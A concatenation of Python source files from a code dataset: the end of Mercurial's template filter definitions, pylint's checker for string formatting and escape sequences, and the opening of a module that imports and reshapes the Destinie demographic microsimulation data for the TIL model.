    returns a single character representing the status (G: good, B: bad,
    S: skipped, U: untested, I: ignored). Returns a single space if `text`
is not a valid bisection status.
"""
return hbisect.shortlabel(text) or ' '
def shortdate(text):
""":shortdate: Date. Returns a date like "2006-09-18"."""
return util.shortdate(text)
def splitlines(text):
""":splitlines: Any text. Split text into a list of lines."""
return templatekw.showlist('line', text.splitlines(), 'lines')
def stringescape(text):
return text.encode('string_escape')
def stringify(thing):
""":stringify: Any type. Turns the value into text by converting values into
text and concatenating them.
"""
if util.safehasattr(thing, '__iter__') and not isinstance(thing, str):
return "".join([stringify(t) for t in thing if t is not None])
return str(thing)
def strip(text):
""":strip: Any text. Strips all leading and trailing whitespace."""
return text.strip()
def stripdir(text):
""":stripdir: Treat the text as path and strip a directory level, if
    possible. For example, "foo" and "foo/bar" become "foo".
"""
dir = os.path.dirname(text)
if dir == "":
return os.path.basename(text)
else:
return dir
def tabindent(text):
""":tabindent: Any text. Returns the text, with every non-empty line
except the first starting with a tab character.
"""
return indent(text, '\t')
def upper(text):
""":upper: Any text. Converts the text to uppercase."""
return encoding.upper(text)
def urlescape(text):
""":urlescape: Any text. Escapes all "special" characters. For example,
"foo bar" becomes "foo%20bar".
"""
return urllib.quote(text)
def userfilter(text):
""":user: Any text. Returns a short representation of a user name or email
address."""
return util.shortuser(text)
def emailuser(text):
""":emailuser: Any text. Returns the user portion of an email address."""
return util.emailuser(text)
def xmlescape(text):
text = (text
.replace('&', '&')
.replace('<', '<')
.replace('>', '>')
.replace('"', '"')
.replace("'", ''')) # ' invalid in HTML
return re.sub('[\x00-\x08\x0B\x0C\x0E-\x1F]', ' ', text)
filters = {
"addbreaks": addbreaks,
"age": age,
"basename": basename,
"count": count,
"date": datefilter,
"domain": domain,
"email": email,
"escape": escape,
"fill68": fill68,
"fill76": fill76,
"firstline": firstline,
"hex": hexfilter,
"hgdate": hgdate,
"isodate": isodate,
"isodatesec": isodatesec,
"json": json,
"jsonescape": jsonescape,
"localdate": localdate,
"lower": lower,
"nonempty": nonempty,
"obfuscate": obfuscate,
"permissions": permissions,
"person": person,
"rfc3339date": rfc3339date,
"rfc822date": rfc822date,
"short": short,
"shortbisect": shortbisect,
"shortdate": shortdate,
"splitlines": splitlines,
"stringescape": stringescape,
"stringify": stringify,
"strip": strip,
"stripdir": stripdir,
"tabindent": tabindent,
"upper": upper,
"urlescape": urlescape,
"user": userfilter,
"emailuser": emailuser,
"xmlescape": xmlescape,
}
def websub(text, websubtable):
""":websub: Any text. Only applies to hgweb. Applies the regular
expression replacements defined in the websub section.
"""
if websubtable:
for regexp, format in websubtable:
text = regexp.sub(format, text)
return text
# tell hggettext to extract docstrings from these functions:
i18nfunctions = filters.values()
| gpl-2.0 | 1,865,124,696,221,018,000 | 29.227378 | 80 | 0.575683 | false |
GbalsaC/bitnamiP | venv/lib/python2.7/site-packages/pylint/checkers/strings.py | 8 | 26724 | # Copyright (c) 2009-2010 Arista Networks, Inc. - James Lingard
# Copyright (c) 2004-2013 LOGILAB S.A. (Paris, FRANCE).
# Copyright 2012 Google Inc.
#
# http://www.logilab.fr/ -- mailto:[email protected]
# This program is free software; you can redistribute it and/or modify it under
# the terms of the GNU General Public License as published by the Free Software
# Foundation; either version 2 of the License, or (at your option) any later
# version.
#
# This program is distributed in the hope that it will be useful, but WITHOUT
# ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
# FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details
#
# You should have received a copy of the GNU General Public License along with
# this program; if not, write to the Free Software Foundation, Inc.,
# 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.
"""Checker for string formatting operations.
"""
import sys
import tokenize
import string
import numbers
import astroid
from pylint.interfaces import ITokenChecker, IAstroidChecker, IRawChecker
from pylint.checkers import BaseChecker, BaseTokenChecker
from pylint.checkers import utils
from pylint.checkers.utils import check_messages
import six
_PY3K = sys.version_info[:2] >= (3, 0)
_PY27 = sys.version_info[:2] == (2, 7)
MSGS = {
'E1300': ("Unsupported format character %r (%#02x) at index %d",
"bad-format-character",
"Used when a unsupported format character is used in a format\
string."),
'E1301': ("Format string ends in middle of conversion specifier",
"truncated-format-string",
"Used when a format string terminates before the end of a \
conversion specifier."),
'E1302': ("Mixing named and unnamed conversion specifiers in format string",
"mixed-format-string",
"Used when a format string contains both named (e.g. '%(foo)d') \
and unnamed (e.g. '%d') conversion specifiers. This is also \
used when a named conversion specifier contains * for the \
minimum field width and/or precision."),
'E1303': ("Expected mapping for format string, not %s",
"format-needs-mapping",
"Used when a format string that uses named conversion specifiers \
is used with an argument that is not a mapping."),
'W1300': ("Format string dictionary key should be a string, not %s",
"bad-format-string-key",
"Used when a format string that uses named conversion specifiers \
is used with a dictionary whose keys are not all strings."),
'W1301': ("Unused key %r in format string dictionary",
"unused-format-string-key",
"Used when a format string that uses named conversion specifiers \
              is used with a dictionary that contains keys not required by the \
format string."),
'E1304': ("Missing key %r in format string dictionary",
"missing-format-string-key",
"Used when a format string that uses named conversion specifiers \
is used with a dictionary that doesn't contain all the keys \
required by the format string."),
'E1305': ("Too many arguments for format string",
"too-many-format-args",
"Used when a format string that uses unnamed conversion \
specifiers is given too many arguments."),
'E1306': ("Not enough arguments for format string",
"too-few-format-args",
"Used when a format string that uses unnamed conversion \
specifiers is given too few arguments"),
'W1302': ("Invalid format string",
"bad-format-string",
"Used when a PEP 3101 format string is invalid.",
{'minversion': (2, 7)}),
'W1303': ("Missing keyword argument %r for format string",
"missing-format-argument-key",
"Used when a PEP 3101 format string that uses named fields "
"doesn't receive one or more required keywords.",
{'minversion': (2, 7)}),
'W1304': ("Unused format argument %r",
"unused-format-string-argument",
"Used when a PEP 3101 format string that uses named "
"fields is used with an argument that "
"is not required by the format string.",
{'minversion': (2, 7)}),
'W1305': ("Format string contains both automatic field numbering "
"and manual field specification",
"format-combined-specification",
"Usen when a PEP 3101 format string contains both automatic "
"field numbering (e.g. '{}') and manual field "
"specification (e.g. '{0}').",
{'minversion': (2, 7)}),
'W1306': ("Missing format attribute %r in format specifier %r",
"missing-format-attribute",
"Used when a PEP 3101 format string uses an "
"attribute specifier ({0.length}), but the argument "
"passed for formatting doesn't have that attribute.",
{'minversion': (2, 7)}),
'W1307': ("Using invalid lookup key %r in format specifier %r",
"invalid-format-index",
"Used when a PEP 3101 format string uses a lookup specifier "
"({a[1]}), but the argument passed for formatting "
"doesn't contain or doesn't have that key as an attribute.",
{'minversion': (2, 7)})
}
OTHER_NODES = (astroid.Const, astroid.List, astroid.Backquote,
astroid.Lambda, astroid.Function,
astroid.ListComp, astroid.SetComp, astroid.GenExpr)
if _PY3K:
import _string
def split_format_field_names(format_string):
return _string.formatter_field_name_split(format_string)
else:
def _field_iterator_convertor(iterator):
for is_attr, key in iterator:
if isinstance(key, numbers.Number):
yield is_attr, int(key)
else:
yield is_attr, key
def split_format_field_names(format_string):
keyname, fielditerator = format_string._formatter_field_name_split()
# it will return longs, instead of ints, which will complicate
# the output
return keyname, _field_iterator_convertor(fielditerator)
def collect_string_fields(format_string):
""" Given a format string, return an iterator
of all the valid format fields. It handles nested fields
as well.
"""
formatter = string.Formatter()
try:
parseiterator = formatter.parse(format_string)
for result in parseiterator:
if all(item is None for item in result[1:]):
# not a replacement format
continue
name = result[1]
nested = result[2]
yield name
if nested:
for field in collect_string_fields(nested):
yield field
except ValueError:
# probably the format string is invalid
# should we check the argument of the ValueError?
raise utils.IncompleteFormatString(format_string)
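# Illustrative example (format strings assumed): iterating
# collect_string_fields("{0.name} and {}") yields '0.name' and '', and a
# nested spec such as "{:{width}}" also yields the inner 'width' field.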
def parse_format_method_string(format_string):
"""
Parses a PEP 3101 format string, returning a tuple of
(keys, num_args, manual_pos_arg),
where keys is the set of mapping keys in the format string, num_args
is the number of arguments required by the format string and
manual_pos_arg is the number of arguments passed with the position.
"""
keys = []
num_args = 0
manual_pos_arg = set()
for name in collect_string_fields(format_string):
if name and str(name).isdigit():
manual_pos_arg.add(str(name))
elif name:
keyname, fielditerator = split_format_field_names(name)
if isinstance(keyname, numbers.Number):
# In Python 2 it will return long which will lead
# to different output between 2 and 3
manual_pos_arg.add(str(keyname))
keyname = int(keyname)
keys.append((keyname, list(fielditerator)))
else:
num_args += 1
return keys, num_args, len(manual_pos_arg)
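# Illustrative example (format string assumed): for "{} {name} {0}" this
# returns keys == [('name', [])], num_args == 1 (the automatic '{}') and a
# manual position count of 1 (the explicit '{0}'); the checker below reports
# such mixed automatic/manual strings as format-combined-specification.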
def get_args(callfunc):
""" Get the arguments from the given `CallFunc` node.
Return a tuple, where the first element is the
number of positional arguments and the second element
is the keyword arguments in a dict.
"""
positional = 0
named = {}
for arg in callfunc.args:
if isinstance(arg, astroid.Keyword):
named[arg.arg] = utils.safe_infer(arg.value)
else:
positional += 1
return positional, named
def get_access_path(key, parts):
""" Given a list of format specifiers, returns
the final access path (e.g. a.b.c[0][1]).
"""
path = []
for is_attribute, specifier in parts:
if is_attribute:
path.append(".{}".format(specifier))
else:
path.append("[{!r}]".format(specifier))
return str(key) + "".join(path)
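# Illustrative example (specifier list assumed): get_access_path('a',
# [(True, 'b'), (False, 0)]) returns "a.b[0]", mirroring how the argument
# passed to str.format would be accessed.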
class StringFormatChecker(BaseChecker):
"""Checks string formatting operations to ensure that the format string
is valid and the arguments match the format string.
"""
__implements__ = (IAstroidChecker,)
name = 'string'
msgs = MSGS
@check_messages(*(MSGS.keys()))
def visit_binop(self, node):
if node.op != '%':
return
left = node.left
args = node.right
if not (isinstance(left, astroid.Const)
and isinstance(left.value, six.string_types)):
return
format_string = left.value
try:
required_keys, required_num_args = \
utils.parse_format_string(format_string)
except utils.UnsupportedFormatCharacter as e:
c = format_string[e.index]
self.add_message('bad-format-character',
node=node, args=(c, ord(c), e.index))
return
except utils.IncompleteFormatString:
self.add_message('truncated-format-string', node=node)
return
if required_keys and required_num_args:
# The format string uses both named and unnamed format
# specifiers.
self.add_message('mixed-format-string', node=node)
elif required_keys:
# The format string uses only named format specifiers.
# Check that the RHS of the % operator is a mapping object
# that contains precisely the set of keys required by the
# format string.
if isinstance(args, astroid.Dict):
keys = set()
unknown_keys = False
for k, _ in args.items:
if isinstance(k, astroid.Const):
key = k.value
if isinstance(key, six.string_types):
keys.add(key)
else:
self.add_message('bad-format-string-key',
node=node, args=key)
else:
# One of the keys was something other than a
# constant. Since we can't tell what it is,
                        # suppress checks for missing keys in the
# dictionary.
unknown_keys = True
if not unknown_keys:
for key in required_keys:
if key not in keys:
self.add_message('missing-format-string-key',
node=node, args=key)
for key in keys:
if key not in required_keys:
self.add_message('unused-format-string-key',
node=node, args=key)
elif isinstance(args, OTHER_NODES + (astroid.Tuple,)):
type_name = type(args).__name__
self.add_message('format-needs-mapping',
node=node, args=type_name)
# else:
# The RHS of the format specifier is a name or
# expression. It may be a mapping object, so
# there's nothing we can check.
else:
# The format string uses only unnamed format specifiers.
# Check that the number of arguments passed to the RHS of
# the % operator matches the number required by the format
# string.
if isinstance(args, astroid.Tuple):
num_args = len(args.elts)
elif isinstance(args, OTHER_NODES + (astroid.Dict, astroid.DictComp)):
num_args = 1
else:
# The RHS of the format specifier is a name or
# expression. It could be a tuple of unknown size, so
# there's nothing we can check.
num_args = None
if num_args is not None:
if num_args > required_num_args:
self.add_message('too-many-format-args', node=node)
elif num_args < required_num_args:
self.add_message('too-few-format-args', node=node)
class StringMethodsChecker(BaseChecker):
__implements__ = (IAstroidChecker,)
name = 'string'
msgs = {
'E1310': ("Suspicious argument in %s.%s call",
"bad-str-strip-call",
"The argument to a str.{l,r,}strip call contains a"
" duplicate character, "),
}
@check_messages(*(MSGS.keys()))
def visit_callfunc(self, node):
func = utils.safe_infer(node.func)
if (isinstance(func, astroid.BoundMethod)
and isinstance(func.bound, astroid.Instance)
and func.bound.name in ('str', 'unicode', 'bytes')):
if func.name in ('strip', 'lstrip', 'rstrip') and node.args:
arg = utils.safe_infer(node.args[0])
if not isinstance(arg, astroid.Const):
return
if len(arg.value) != len(set(arg.value)):
self.add_message('bad-str-strip-call', node=node,
args=(func.bound.name, func.name))
elif func.name == 'format':
if _PY27 or _PY3K:
self._check_new_format(node, func)
def _check_new_format(self, node, func):
""" Check the new string formatting. """
# TODO: skip (for now) format nodes which don't have
# an explicit string on the left side of the format operation.
# We do this because our inference engine can't properly handle
# redefinitions of the original string.
# For more details, see issue 287.
#
# Note that there may not be any left side at all, if the format method
# has been assigned to another variable. See issue 351. For example:
#
# fmt = 'some string {}'.format
# fmt('arg')
if (isinstance(node.func, astroid.Getattr)
and not isinstance(node.func.expr, astroid.Const)):
return
try:
strnode = next(func.bound.infer())
except astroid.InferenceError:
return
if not isinstance(strnode, astroid.Const):
return
if node.starargs or node.kwargs:
# TODO: Don't complicate the logic, skip these for now.
return
try:
positional, named = get_args(node)
except astroid.InferenceError:
return
try:
fields, num_args, manual_pos = parse_format_method_string(strnode.value)
except utils.IncompleteFormatString:
self.add_message('bad-format-string', node=node)
return
named_fields = set(field[0] for field in fields
if isinstance(field[0], six.string_types))
if num_args and manual_pos:
self.add_message('format-combined-specification',
node=node)
return
check_args = False
# Consider "{[0]} {[1]}" as num_args.
num_args += sum(1 for field in named_fields
if field == '')
if named_fields:
for field in named_fields:
if field not in named and field:
self.add_message('missing-format-argument-key',
node=node,
args=(field, ))
for field in named:
if field not in named_fields:
self.add_message('unused-format-string-argument',
node=node,
args=(field, ))
# num_args can be 0 if manual_pos is not.
num_args = num_args or manual_pos
if positional or num_args:
empty = any(True for field in named_fields
if field == '')
if named or empty:
# Verify the required number of positional arguments
# only if the .format got at least one keyword argument.
                # This means that the format string accepts both
                # positional and named fields and we should warn
                # when one of them is missing or extra.
check_args = True
else:
check_args = True
if check_args:
# num_args can be 0 if manual_pos is not.
num_args = num_args or manual_pos
if positional > num_args:
self.add_message('too-many-format-args', node=node)
elif positional < num_args:
self.add_message('too-few-format-args', node=node)
self._check_new_format_specifiers(node, fields, named)
def _check_new_format_specifiers(self, node, fields, named):
"""
Check attribute and index access in the format
string ("{0.a}" and "{0[a]}").
"""
for key, specifiers in fields:
# Obtain the argument. If it can't be obtained
            # or inferred, skip this check.
if key == '':
# {[0]} will have an unnamed argument, defaulting
# to 0. It will not be present in `named`, so use the value
# 0 for it.
key = 0
if isinstance(key, numbers.Number):
try:
argname = utils.get_argument_from_call(node, key)
except utils.NoSuchArgumentError:
continue
else:
if key not in named:
continue
argname = named[key]
if argname in (astroid.YES, None):
continue
try:
argument = next(argname.infer())
except astroid.InferenceError:
continue
if not specifiers or argument is astroid.YES:
# No need to check this key if it doesn't
# use attribute / item access
continue
if argument.parent and isinstance(argument.parent, astroid.Arguments):
# Ignore any object coming from an argument,
# because we can't infer its value properly.
continue
previous = argument
parsed = []
for is_attribute, specifier in specifiers:
if previous is astroid.YES:
break
parsed.append((is_attribute, specifier))
if is_attribute:
try:
previous = previous.getattr(specifier)[0]
except astroid.NotFoundError:
if (hasattr(previous, 'has_dynamic_getattr') and
previous.has_dynamic_getattr()):
# Don't warn if the object has a custom __getattr__
break
path = get_access_path(key, parsed)
self.add_message('missing-format-attribute',
args=(specifier, path),
node=node)
break
else:
warn_error = False
if hasattr(previous, 'getitem'):
try:
previous = previous.getitem(specifier)
except (IndexError, TypeError):
warn_error = True
else:
try:
# Lookup __getitem__ in the current node,
# but skip further checks, because we can't
                            # retrieve the looked-up object
previous.getattr('__getitem__')
break
except astroid.NotFoundError:
warn_error = True
if warn_error:
path = get_access_path(key, parsed)
self.add_message('invalid-format-index',
args=(specifier, path),
node=node)
break
try:
previous = next(previous.infer())
except astroid.InferenceError:
# can't check further if we can't infer it
break
class StringConstantChecker(BaseTokenChecker):
"""Check string literals"""
__implements__ = (ITokenChecker, IRawChecker)
name = 'string_constant'
msgs = {
'W1401': ('Anomalous backslash in string: \'%s\'. '
'String constant might be missing an r prefix.',
'anomalous-backslash-in-string',
'Used when a backslash is in a literal string but not as an '
'escape.'),
'W1402': ('Anomalous Unicode escape in byte string: \'%s\'. '
'String constant might be missing an r or u prefix.',
'anomalous-unicode-escape-in-string',
'Used when an escape like \\u is encountered in a byte '
'string where it has no effect.'),
}
# Characters that have a special meaning after a backslash in either
# Unicode or byte strings.
ESCAPE_CHARACTERS = 'abfnrtvx\n\r\t\\\'\"01234567'
# TODO(mbp): Octal characters are quite an edge case today; people may
# prefer a separate warning where they occur. \0 should be allowed.
# Characters that have a special meaning after a backslash but only in
# Unicode strings.
UNICODE_ESCAPE_CHARACTERS = 'uUN'
def process_module(self, module):
self._unicode_literals = 'unicode_literals' in module.future_imports
def process_tokens(self, tokens):
for (tok_type, token, (start_row, _), _, _) in tokens:
if tok_type == tokenize.STRING:
# 'token' is the whole un-parsed token; we can look at the start
# of it to see whether it's a raw or unicode string etc.
self.process_string_token(token, start_row)
def process_string_token(self, token, start_row):
for i, c in enumerate(token):
if c in '\'\"':
quote_char = c
break
# pylint: disable=undefined-loop-variable
prefix = token[:i].lower() # markers like u, b, r.
after_prefix = token[i:]
if after_prefix[:3] == after_prefix[-3:] == 3 * quote_char:
string_body = after_prefix[3:-3]
else:
string_body = after_prefix[1:-1] # Chop off quotes
# No special checks on raw strings at the moment.
if 'r' not in prefix:
self.process_non_raw_string_token(prefix, string_body, start_row)
def process_non_raw_string_token(self, prefix, string_body, start_row):
"""check for bad escapes in a non-raw string.
        prefix: lowercase string of string prefix markers, e.g. 'ur'.
string_body: the un-parsed body of the string, not including the quote
marks.
start_row: integer line number in the source.
"""
# Walk through the string; if we see a backslash then escape the next
# character, and skip over it. If we see a non-escaped character,
# alert, and continue.
#
# Accept a backslash when it escapes a backslash, or a quote, or
# end-of-line, or one of the letters that introduce a special escape
# sequence <http://docs.python.org/reference/lexical_analysis.html>
#
# TODO(mbp): Maybe give a separate warning about the rarely-used
# \a \b \v \f?
#
# TODO(mbp): We could give the column of the problem character, but
# add_message doesn't seem to have a way to pass it through at present.
i = 0
while True:
i = string_body.find('\\', i)
if i == -1:
break
# There must be a next character; having a backslash at the end
# of the string would be a SyntaxError.
next_char = string_body[i+1]
match = string_body[i:i+2]
if next_char in self.UNICODE_ESCAPE_CHARACTERS:
if 'u' in prefix:
pass
elif (_PY3K or self._unicode_literals) and 'b' not in prefix:
pass # unicode by default
else:
self.add_message('anomalous-unicode-escape-in-string',
line=start_row, args=(match, ))
elif next_char not in self.ESCAPE_CHARACTERS:
self.add_message('anomalous-backslash-in-string',
line=start_row, args=(match, ))
# Whether it was a valid escape or not, backslash followed by
# another character can always be consumed whole: the second
# character can never be the start of a new backslash escape.
i += 2
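# A hedged illustration (editor-added, not part of the original checker) of the
# literals the escape checks above are meant to flag; the assignments are
# hypothetical:
#
#     x = 'a\tb'        # '\t' is a recognised escape: no warning
#     y = 'a\db'        # '\d' is not: W1401 (anomalous-backslash-in-string)
#     z = b'caf\u00e9'  # '\u' has no effect in a byte string: W1402
#     w = r'a\db'       # raw strings are skipped entirely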
def register(linter):
"""required method to auto register this checker """
linter.register_checker(StringFormatChecker(linter))
linter.register_checker(StringMethodsChecker(linter))
linter.register_checker(StringConstantChecker(linter))
| agpl-3.0 | -5,079,807,530,429,138,000 | 42.453659 | 84 | 0.549805 | false |
TaxIPP-Life/til-france | til_france/data/data/Destinie.py | 1 | 28133 | # -*- coding:utf-8 -*-
'''
Created on 11 September 2013
This program:
Input:
Output:
'''
import logging
from pandas import merge, DataFrame, concat, read_table
import numpy as np
import os
import pdb
import time
import sys
# 1 - Import the classes/libraries/tables needed to load the Destinie data
# -> Retrieve the information from Patrimoine
from til.data.DataTil import DataTil
from til.data.utils.utils import minimal_dtype, drop_consecutive_row
from til.CONFIG import path_data_destinie
log = logging.getLogger(__name__)
class Destinie(DataTil):
def __init__(self):
DataTil.__init__(self)
self.name = 'Destinie'
self.survey_year = 2009
self.last_year = 2060
self.survey_date = 100 * self.survey_year + 1
        # TODO: Write a function that checks where we are and whether the previous steps were done correctly, etc.
        # TODO: In the same vein, variable deletion should be defined according to the upcoming steps.
self.methods_order = [
'load', 'format_initial', 'enf_to_par', 'check_partneroint', 'creation_menage', 'creation_foy',
'var_sup', 'add_futur', 'store_to_liam'
]
def load(self):
def _BioEmp_in_2():
            ''' Split BioEmp into three tables '''
longueur_carriere = 106 # self.max_dur
start_time = time.time()
            # TODO: revisit BioEmp's colnames: remove it?
colnames = list(range(longueur_carriere))
path = os.path.join(path_data_destinie, 'BioEmp.txt')
assert os.path.exists(path), 'Error for BioEmp.txt path. File cannot be found in {}'.format(path)
BioEmp = read_table(path, sep=';', header=None, names=colnames)
taille = len(BioEmp) / 3
BioEmp['id'] = BioEmp.index / 3
            # selection0: time-invariant information on individuals (identifier, sex, year of birth and
            # age at the end of schooling)
selection0 = [3 * x for x in range(taille)]
ind = BioEmp.iloc[selection0].copy()
ind.reset_index(inplace=True)
ind.rename(columns = {1: 'sexe', 2: 'naiss', 3: 'findet', 4: 'tx_prime_fct'}, inplace=True)
for column in ind.columns:
if column in ['sexe', 'naiss', 'findet']:
ind[column] = ind[column].astype(int)
elif column in ['tx_prime_fct']:
continue
else:
del ind[column]
ind['id'] = ind.index
            # selection1: information on employment statuses
selection1 = [3 * x + 1 for x in range(taille)]
statut = BioEmp.iloc[selection1].copy()
statut = np.array(statut.set_index('id').stack().reset_index())
# statut = statut.rename(columns={'level_1':'period', 0:'workstate'})
# statut = statut[['id', 'period', 'workstate']] #.fillna(np.nan)
# statut = minimal_dtype(statut)
            # selection2: information on wages
selection2 = [3 * x + 2 for x in range(taille)]
sal = BioEmp.iloc[selection2].copy()
sal = sal.set_index('id').stack().reset_index()
sal = sal[0]
# .fillna(np.nan)
# sal = minimal_dtype(sal)
            # Merge selection 1 and 2:
emp = np.zeros((len(sal), 4))
emp[:, 0:3] = statut
emp[:, 3] = sal
emp = DataFrame(emp, columns=['id', 'period', 'workstate', 'salaire_imposable'])
            # Convert to the minimal dtypes
emp = emp.fillna(np.nan).replace(-1, np.nan)
emp = minimal_dtype(emp)
return ind, emp
def _lecture_BioFam():
path = os.path.join(path_data_destinie, 'BioFam.txt')
BioFam = read_table(
path,
sep = ';',
header = None,
names = ['id', 'pere', 'mere', 'civilstate', 'partner', 'enf1', 'enf2', 'enf3', 'enf4', 'enf5', 'enf6']
)
            # Boundary indexes marking each change of date
delimiters = BioFam['id'].str.contains('Fin')
            annee = BioFam[delimiters].index.tolist() # gives all the boundary indexes
annee = [-1] + annee # in order to simplify loops later
# create a series period
year0 = self.survey_year
period = []
for k in range(len(annee) - 1):
period = period + [year0 + k] * (annee[k + 1] - 1 - annee[k])
BioFam = BioFam[~delimiters].copy()
BioFam['period'] = period
list_enf = ['enf1', 'enf2', 'enf3', 'enf4', 'enf5', 'enf6']
BioFam[list_enf + ['pere', 'mere', 'partner']] -= 1
BioFam.loc[:, 'id'] = BioFam.loc[:, 'id'].astype(int) - 1
for var in ['pere', 'mere', 'partner'] + list_enf:
BioFam.loc[BioFam[var] < 0, var] = -1
BioFam = BioFam.fillna(-1)
# BioFam = drop_consecutive_row(
# BioFam.sort(['id', 'period']), ['id', 'pere', 'mere', 'partner', 'civilstate'])
BioFam.replace(-1, np.nan, inplace=True)
BioFam = minimal_dtype(BioFam)
BioFam['civilstate'].replace([2, 1, 4, 3, 5], [1, 2, 3, 4, 5], inplace=True)
return BioFam
log.info(u"Début de l'importation des données")
start_time = time.time()
self.entity_by_name['individus'], self.emp = _BioEmp_in_2()
def _recode_sexe(sexe):
            ''' should be in the format step but is more convenient here '''
if sexe.max() == 2:
sexe.replace(1, 0, inplace=True)
sexe.replace(2, 1, inplace=True)
return sexe
self.entity_by_name['individus']['sexe'] = _recode_sexe(self.entity_by_name['individus']['sexe'])
self.BioFam = _lecture_BioFam()
log.info(u"Temps d'importation des données : " + str(time.time() - start_time) + "s")
log.info(u"fin de l'importation des données")
def format_initial(self):
'''
        Aggregate the data into a single base
            - ind : demographics + individual characteristics
            - emp_tot : career histories and associated wages
'''
log.info(u"Début de la mise en forme initiale")
start_time = time.time()
def _Emp_clean(ind, emp):
            ''' Format the career data:
            Update the period variable
            Create the deces table giving each individual's year of death (index = identifier) '''
emp = merge(emp, ind[['naiss']], left_on = 'id', right_on = ind[['naiss']].index)
emp['period'] = emp['period'] + emp['naiss']
# deces = emp.groupby('id')['period'].max()
emp = emp[['id', 'period', 'workstate', 'salaire_imposable']]
            # Two steps to recode a new Destinie base with the coding of an
            # older base: new states not taken into account for now
            # contract worker + trainee -> general scheme non-executive
emp['workstate'].replace([11, 12, 13], 1, inplace = True)
            # sickness + disability -> inactive
emp['workstate'].replace([621, 623, 624, 63], 6, inplace = True)
            # Recode the categories
            # TODO: eventually write a dedicated function for this step -> _rename(var)
            # inactif (inactive) <- 1 # chomeur (unemployed) <- 2 # non_cadre <- 3 # cadre <- 4
            # fonct_a (active civil servant) <- 5 # fonct_s (sedentary civil servant) <- 6 # indep <- 7 # avpf <- 8
            # preret (early retirement) <- 9 # deceased, or immigrant not yet arrived in France <- 0
            # retraite (retired) <- 10 # etudiant (student) <- 11 (schooling, excluding overlap)
emp['workstate'].replace(
[0, 1, 2, 31, 32, 4, 5, 6, 7, 9, 8, 63],
[0, 3, 4, 5, 6, 7, 2, 1, 9, 8, 10, 11],
inplace = True
)
return emp
def _ind_total(BioFam, ind, emp):
            ''' merge: BioFam + ind + emp -> ind '''
survey_year = self.survey_year
to_ind = merge(emp, BioFam, on=['id', 'period'], how ='left')
ind = merge(to_ind, ind, on='id', how = 'left')
ind.sort(['id', 'period'], inplace=True)
cond_atemp = (
(ind['naiss'] > survey_year) & (ind['period'] != ind['naiss'])
) | (
(ind['naiss'] <= survey_year) & (ind['period'] != survey_year)
)
ind.loc[cond_atemp, ['sexe', 'naiss', 'findet', 'tx_prime_fct']] = -1
return ind
def _ind_in_3(ind):
            '''split the full table into past information, survey-date information and future information
            ind -> past, ind, futur '''
survey_year = self.survey_year
ind_survey = ind.loc[ind['period'] == survey_year, :].copy()
ind_survey.fillna(-1, inplace=True)
ind_survey['civilstate'].replace(-1, 2, inplace=True)
ind_survey['workstate'].replace([-1, 0], 1, inplace=True)
if 'tx_prime_fct' in ind_survey.columns:
ind_survey.rename(columns={'tx_prime_fct': 'tauxprime'}, inplace=True)
log.info(u"Nombre dindividus présents dans la base en {}: {}".format(
survey_year,
len(ind_survey),
))
past = ind[ind['period'] < survey_year].copy()
list_enf = ['enf1', 'enf2', 'enf3', 'enf4', 'enf5', 'enf6']
list_intraseques = ['sexe', 'naiss', 'findet', 'tx_prime_fct']
list_to_drop = list_intraseques + list_enf
past.drop(list_to_drop, axis=1, inplace=True)
            # It's a bit strange because the data were in the right shape
            # at first, but this way is more general
past['period'] = 100 * past['period'] + 1
for varname in ['salaire_imposable', 'workstate']:
self.longitudinal[varname] = past.pivot(index='id', columns='period', values=varname)
log.info(u"Nombre de lignes sur le passé : {} (informations de {} à {}".format(
len(past),
past['period'].min(),
past['period'].max()),
)
past['period'] = (past['period'] - 1) / 100
            # The futur table must contain one row per change of status from year n+1 onwards;
            # year n is kept in order to
            # see whether the situation changes between n and n+1
            # Indication of the year of the change + unchanged variables -> -1
futur = ind[ind['period'] >= survey_year].copy()
futur.drop(list_enf, axis=1, inplace=True)
futur.fillna(-1, inplace=True)
# futur = drop_consecutive_row(futur.sort(['id', 'period']),
# ['id', 'workstate', 'salaire_imposable', 'pere', 'mere', 'civilstate', 'partner'])
futur = futur[futur['period'] > survey_year]
return ind_survey, past, futur
def _work_on_futur(futur, ind):
            ''' add the information on the date of death '''
            # Add one row per individual to record their death (only when period != -1)
def __deces_indicated_lastyearoflife():
# dead = DataFrame(index = deces.index.values, columns = futur.columns)
# dead['period'][deces.index.values] = deces.values
# dead['id'][deces.index.values] = deces.index.values
# dead.fillna(-1, inplace=True)
# dead['death'] = dead['period']*100 + 1
dead = DataFrame(deces)
dead['id'] = dead.index
dead['death'] = dead['period'] * 100 + 1
futur = concat([futur, dead], axis=0, ignore_index=True)
futur.fillna(-1, inplace=True)
futur = futur.sort(['id', 'period', 'dead']).reset_index().drop('index', 1)
futur.drop_duplicates(['id', 'period'], inplace=True)
dead = futur[['id', 'period']].drop_duplicates('id', take_last=True).index
futur['deces'] = -1
futur.loc[dead, 'deces'] = 1
futur = futur.sort(['period', 'id']).reset_index().drop(['index', 'dead'], 1)
return futur
def __death_unic_event(futur):
futur = futur.sort(['id', 'period'])
no_last = futur.duplicated('id', take_last=True)
futur['death'] = -1
                cond_death = ~no_last & ((futur['workstate'] == 0) | (futur['period'] != 2060))
futur.loc[cond_death, 'death'] = 100 * futur.loc[cond_death, 'period'] + 1
futur.loc[(futur['workstate'] != 0) & (futur['death'] != -1), 'death'] += 1
add_lines = futur.loc[(futur['period'] > futur['death']) & (futur['death'] != -1), 'id']
if len(add_lines) != 0:
                    # TODO: plan to add a row when no row is associated with the date of death.
print(len(add_lines))
pdb.set_trace()
return futur
futur = __death_unic_event(futur)
return futur
emp = _Emp_clean(self.entity_by_name['individus'], self.emp)
ind_total = _ind_total(self.BioFam, self.entity_by_name['individus'], emp)
ind, past, futur = _ind_in_3(ind_total)
futur = _work_on_futur(futur, ind)
for table in ind, past, futur:
table['period'] = 100 * table['period'] + 1
self.entity_by_name['individus'] = ind
self.past = past
self.futur = futur
log.info(u"Temps de la mise en forme initiale : " + str(time.time() - start_time) + "s")
log.info(u"Fin de la mise en forme initiale")
def enf_to_par(self):
        '''Check the parent-child links '''
ind = self.entity_by_name['individus']
list_enf = ['enf1', 'enf2', 'enf3', 'enf4', 'enf5', 'enf6']
ind = ind.set_index('id')
ind['id'] = ind.index
year_ini = self.survey_year # = 2009
log.info(u"Début de l'initialisation des données pour " + str(year_ini))
        # Initial declarations by the children
pere_ini = ind[['id', 'pere']]
